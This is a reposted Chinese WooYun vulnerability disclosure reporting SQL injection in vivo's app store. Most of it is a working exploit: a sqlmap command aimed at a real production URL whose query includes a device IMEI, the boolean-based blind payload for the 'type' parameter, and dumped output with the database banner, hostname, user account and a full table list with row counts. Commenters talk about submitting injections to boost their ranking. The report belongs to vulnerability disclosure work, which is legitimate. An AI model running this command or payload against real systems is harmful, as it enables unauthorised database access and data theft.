vivo应用商店一处SQL注入

admin
admin
admin
140552
文章
117
评论
2017年4月13日00:33:27评论250 views字数 214阅读0分42秒阅读模式
摘要

2016-04-01: 细节已通知厂商并且等待厂商处理中
2016-04-01: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-04-06: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(12) 关注此漏洞

缺陷编号: WooYun-2016-191301

漏洞标题: vivo应用商店一处SQL注入

相关厂商: vivo智能手机

漏洞作者: sauce

提交时间: 2016-04-01 09:46

公开时间: 2016-04-06 09:50

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

1人收藏

漏洞详情

披露状态:

2016-04-01: 细节已通知厂商并且等待厂商处理中
2016-04-01: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-04-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt

详细说明:

code 区域 
python sqlmap.py -u "http://main.appstore.vivo.com.cn/rec/newapps?nt=WIFI&u=-57806365&;model=vivo+Y13iL&density=1.5&pictype=webp&elapsedtime=13993004&screensize=480_854&an=4.4.4&imei=868102024538774&app_version=622&type=2&av=19&cs=0&s=2%7C3511262971"
code 区域 
Parameter: type (GET)
     Type: boolean-based blind
     Title: MySQL >= 5.0 boolean-based blind - Parameter replace
     Payload: nt=WIFI&u=-57806365&model=vivo Y13iL&density=1.5&pictype=webp&elapsedtime=13993004&screensize=480_854&an=4.4.4&imei=868102024538774&app_version=622&type=(SELECT (CASE WHEN (9154=9154) THEN 9154 ELSE 9154*(SELECT 9154 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&av=19&cs=0&s=2|3511262971
 ---
 back-end DBMS: MySQL 5.0
 banner:    '5.5.39-log'
 current user:    '%'
 current database:    'appstore'
 hostname:    'bj_appdb02'
 current user is DBA:    False
 database management system users [1]:
 [*] 'myappstore_r'@'10.13.13.%'
 
 database management system users privileges:
 [*] %myappstore_r% [1]:
     privilege: USAGE
 
 database management system users roles:
 [*] %myappstore_r% [1]:
     role: USAGE
  
 available databases [3]:
 [*] appstore
 [*] information_schema
 [*] test

漏洞证明:

code 区域 
Database: appstore
 +--------------------------------------+---------+
 | Table                                | Entries |
 +--------------------------------------+---------+
 | t_app_comment                        | 8381086 |
 | t_app_baidu                          | 5399705 |
 | t_app_screenshot_history             | 5244691 |
 | t_app_download_log_20141104          | 5163862 |
 | t_app_download_complete_log_20141107 | 4758294 |
 | t_browse_app_log_20141107            | 3713899 |
 | t_app_download_complete_log_20141104 | 3474746 |
 | t_browse_app_log_20141104            | 2880982 |
 | t_app_comment_20150321_bak           | 1300759 |
 | t_app_pc_download_log                | 1148008 |
 | t_push_log_20141107                  | 1072361 |
 | t_checkmd5fail_log                   | 644221  |
 | t_testin_passed_overview             | 549221  |
 | t_search_word_log_20141107           | 452975  |
 | t_app_screenshot                     | 348472  |
 | t_search_word_log_20141104           | 337439  |
 | t_testin_safe_report                 | 329668  |
 | t_ac_app_screenshot                  | 324204  |
 | t_search_word_log_20150202           | 320806  |
 | t_app_relate_recommend               | 303661  |
 | t_rank_setup                         | 260106  |
 | t_app_filter                         | 130289  |
 | t_testin_overview                    | 103093  |
 | t_testin_safe_report_back            | 87557   |
 | t_comment_forbid_reason              | 84861   |
 | t_testin_back                        | 82375   |
 | t_app_info                           | 77037   |
 | t_ac_app_info                        | 76660   |
 | t_app_tags                           | 70172   |
 | t_app_download_count_201603          | 65873   |
 | t_app_download_stat                  | 65873   |
 | t_app_download_month_rank            | 65872   |
 | t_app_download_count_201601          | 64731   |
 | t_app_download_count_201602          | 64343   |
 | t_app_download_count_201511          | 63951   |
 | t_app_download_count_201512          | 63753   |
 | t_app_download_count_201510          | 57766   |
 | t_app_download_count_201509          | 56187   |
 | t_app_download_count_201508          | 55218   |
 | t_app_download_count_201507          | 53310   |
 | t_app_download_count_201506          | 50191   |
 | t_app_download_count_201505          | 49740   |
 | t_app_download_count_201504          | 49207   |
 | t_testin                             | 48941   |
 | t_app_download_count_201503          | 47113   |
 | t_user_operation                     | 43929   |
 | t_award_info                         | 35707   |
 | t_app_download_count_201502          | 34512   |
 | t_apk_delete                         | 33559   |
 | t_app_download_count_201501          | 33179   |
 | t_rank_risk                          | 33111   |
 | t_comment_grade                      | 32560   |
 | t_testin_failed_overview             | 31168   |
 | t_app_download_count_201412          | 28467   |
 | t_ac_wdj_icon                        | 27544   |
 | t_app_download_count_201411          | 24203   |
 | t_testin_overview_back               | 23695   |
 | t_type_app                           | 22178   |
 | t_type_game                          | 21813   |
 | t_type_rank_setup                    | 19412   |
 | t_comment_grade_20150321_bak         | 17779   |
 | t_push_log_20150202                  | 15249   |
 | t_console_adminlog                   | 10145   |
 | t_focus_rank_setup                   | 9804    |
 | t_type_recommend_rank_bspread        | 9787    |
 | t_hub_set                            | 7050    |
 | t_android_permission                 | 6847    |
 | t_baidu_app_comment                  | 6586    |
 | t_rank_idx_rec_ab                    | 6400    |
 | t_app_type_info                      | 5443    |
 | t_testin_noexecute_overview          | 5200    |
 | t_ad_app                             | 4845    |
 | t_ad_icon                            | 4650    |
 | t_app_baidu_type                     | 4532    |
 | t_ip_area_config                     | 4449    |
 | t_search_word_rank                   | 3900    |
 | t_relation_tags                      | 2695    |
 | t_baidu_app_screenshot               | 2158    |
 | t_comment_forbid                     | 2073    |
 | t_excel_rank_app                     | 1999    |
 | t_excel_rank_popup_word              | 1940    |
 | t_app_info_delete                    | 1828    |
 | t_baidu_app_info_delete              | 1397    |
 | t_business_game                      | 1346    |
 | t_ad_info                            | 1311    |
 | t_model_topic                        | 1082    |
 | t_rank_popular_daily                 | 1000    |
 | t_popupword_rank_setup               | 984     |
 | t_template_app                       | 862     |
 | t_app_screenshot_img                 | 789     |
 | t_hot_word                           | 780     |
 | t_top_sync                           | 750     |
 | t_tags                               | 745     |
 | t_topic_icon                         | 732     |
 | t_censor_word                        | 720     |
 | t_baidu_app_info                     | 709     |
 | t_app_package_double                 | 628     |
 | t_excel_rank_hot_word                | 596     |
 | t_browse_app_log_20150202            | 531     |
 | t_topic_module_app                   | 474     |
 | t_activity_info                      | 433     |
 | t_push_log_20151205                  | 425     |
 | t_excel_rank_type_app                | 401     |
 | t_type_recommend_rank                | 400     |
 | t_charge_sign                        | 376     |
 | t_excellent_app_log                  | 352     |
 | t_cellphone_recommend_bak            | 320     |
 | t_ac_app_info_all                    | 319     |
 | t_packages_update_log_20141107       | 316     |
 | t_tmp_package                        | 312     |
 | t_topic_info                         | 282     |
 | t_packages_update_log_20141104       | 272     |
 | t_charge_sign_bak                    | 248     |
 | t_search_word_relation               | 227     |
 | t_app_download_month_top             | 220     |
 | t_app_onsale_date_top                | 220     |
 | t_rank_application                   | 220     |
 | t_rank_console_game                  | 220     |
 | t_rank_game                          | 220     |
 | t_rank_hot                           | 220     |
 | t_rank_new                           | 220     |
 | t_rank_online_game                   | 220     |
 | t_rank_popular                       | 220     |
 | t_top_application                    | 220     |
 | t_top_console_game                   | 220     |
 | t_top_game                           | 220     |
 | t_top_online_game                    | 220     |
 | t_top_risk                           | 220     |
 | t_rank_risk_order                    | 217     |
 | t_activity_app                       | 201     |
 | t_rank_hot_bak                       | 200     |
 | t_rank_new_bak                       | 200     |
 | t_model_activity                     | 196     |
 | t_console_adminmenu                  | 175     |
 | t_hotword_autosched                  | 175     |
 | t_search_word_top                    | 174     |
 | t_system_package_tmp                 | 166     |
 | t_model_info_sub                     | 161     |
 | t_ac_app_info_hot                    | 159     |
 | t_app_install_log                    | 155     |
 | t_index_model_apps                   | 130     |
 | t_top_girls_app                      | 128     |
 | t_top_boys_app                       | 126     |
 | t_model_info                         | 121     |
 | t_rank_place                         | 120     |
 | t_recommend_common_setup             | 119     |
 | t_app_history_info                   | 117     |
 | t_testin_risked_overview             | 116     |
 | t_app_type_second                    | 108     |
 | t_ac_spider_list_task                | 107     |
 | t_ac_spider_list_template            | 107     |
 | t_push_log_20151209                  | 105     |
 | t_app_recommend                      | 100     |
 | t_game_recommend                     | 100     |
 | t_search_hot_word                    | 100     |
 | t_search_hot_word_bak                | 99      |
 | t_cellphone_recommend                | 98      |
 | t_console_adminmenu_bak              | 93      |
 | t_type_rank                          | 93      |
 | t_console_constant                   | 73      |
 | t_start_page                         | 68      |
 | t_focus_setting                      | 64      |
 | t_app_hui                            | 61      |
 | t_topic_module_item                  | 46      |
 | t_console_h5resource                 | 44      |
 | t_system_package                     | 42      |
 | t_developer_app_type                 | 37      |
 | t_topic_module                       | 32      |
 | t_focus_picture                      | 29      |
 | t_app_type_bak                       | 27      |
 | t_type_icon_bak                      | 27      |
 | t_app_type                           | 26      |
 | t_editor_recommend                   | 26      |
 | t_type_icon                          | 26      |
 | t_admin_user_security                | 24      |
 | t_search_app                         | 24      |
 | t_tmp_package2                       | 24      |
 | `t_console_adminuser-20141229-bak`   | 22      |
 | t_baidu_type                         | 21      |
 | t_type_personal                      | 21      |
 | t_type_mapping                       | 20      |
 | t_template_apptype                   | 19      |
 | t_app_list                           | 18      |
 | t_push_log_20141104                  | 16      |
 | t_index_model_subtitle               | 15      |
 | t_db_version                         | 14      |
 | t_hub_content                        | 14      |
 | t_rank_hot_unsupport                 | 14      |
 | t_update_system_package              | 14      |
 | t_hub_info                           | 12      |
 | t_model_ad                           | 10      |
 | t_operation_constant                 | 10      |
 | t_word_popup                         | 10      |
 | t_push_log_20151206                  | 6       |
 | t_series_info                        | 6       |
 | t_app_replace                        | 5       |
 | t_entry_info                         | 5       |
 | t_template_resource                  | 5       |
 | t_activity_tag                       | 4       |
 | t_push_activity                      | 4       |
 | t_top_wrapper                        | 4       |
 | t_top_wrapper_cache                  | 4       |
 | t_ac_spider_detail_template          | 3       |
 | t_activity_set_img                   | 3       |
 | t_app_replace_history                | 3       |
 | t_ac_single_download                 | 2       |
 | t_focus_grid                         | 2       |
 | t_moble_error                        | 2       |
 | t_moble_error_baidu                  | 2       |
 | t_search_black_list                  | 2       |
 | t_top_relation                       | 2       |
 | t_activity_set                       | 1       |
 | t_app_baidu_install_log              | 1       |
 | t_app_type_new                       | 1       |
 | t_hotapp_info                        | 1       |
 | t_index_model                        | 1       |
 | t_recommend_common                   | 1       |
 | t_review_records                     | 1       |
 +--------------------------------------+---------+

修复方案:

版权声明:转载请注明来源 sauce@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-04-06 09:50

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-04-06 15:15 | 老实先生 ( 普通白帽子 | Rank:228 漏洞数:75 | 专业承揽工程刮大白,外墙涂料,外墙保温,...)

    2

    为什么你这么牛?

  2. 2016-04-06 17:23 | sauce ( 普通白帽子 | Rank:285 漏洞数:46 | 面向人民币编程)

    1

    @老实先生哪里哪里

  3. 2016-04-06 17:40 | 老实先生 ( 普通白帽子 | Rank:228 漏洞数:75 | 专业承揽工程刮大白,外墙涂料,外墙保温,...)

    1

    到什么瓶颈了

  4. 2016-04-06 18:20 | sauce ( 普通白帽子 | Rank:285 漏洞数:46 | 面向人民币编程)

    1

    @老实先生 看我交的 全是注入 完全刷rank的节奏 搞不动众测 不知道该怎么学

  5. 2016-04-06 20:26 | 老实先生 ( 普通白帽子 | Rank:228 漏洞数:75 | 专业承揽工程刮大白,外墙涂料,外墙保温,...)

    1

    那我也遇到瓶颈了 呵呵

  6. 2016-04-06 22:04 | 欧尼酱 ( 路人 | Rank:15 漏洞数:7 | 技术马马虎虎)

    1

    为什么这么叼

  7. 2016-04-07 15:03 | P0ker_L ( 路人 | Rank:8 漏洞数:2 | 趣果有间,孤独无解)

    1

    @sauce 想刷rank,我都不知道要怎么找有注入的站。。

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin